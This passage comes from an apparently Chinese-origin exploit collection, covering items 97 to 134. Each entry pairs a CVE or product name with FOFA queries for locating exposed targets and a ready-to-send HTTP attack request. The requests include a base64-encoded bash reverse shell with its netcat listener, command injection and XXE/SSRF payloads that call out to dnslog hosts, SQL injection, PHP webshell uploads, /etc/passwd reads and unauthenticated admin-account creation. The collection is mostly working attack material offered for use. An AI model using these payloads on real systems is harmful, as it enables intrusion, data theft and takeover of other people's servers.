POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast HD intelligent recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php.

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account and password are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

File path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; the plaintext is sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD
129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py
133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

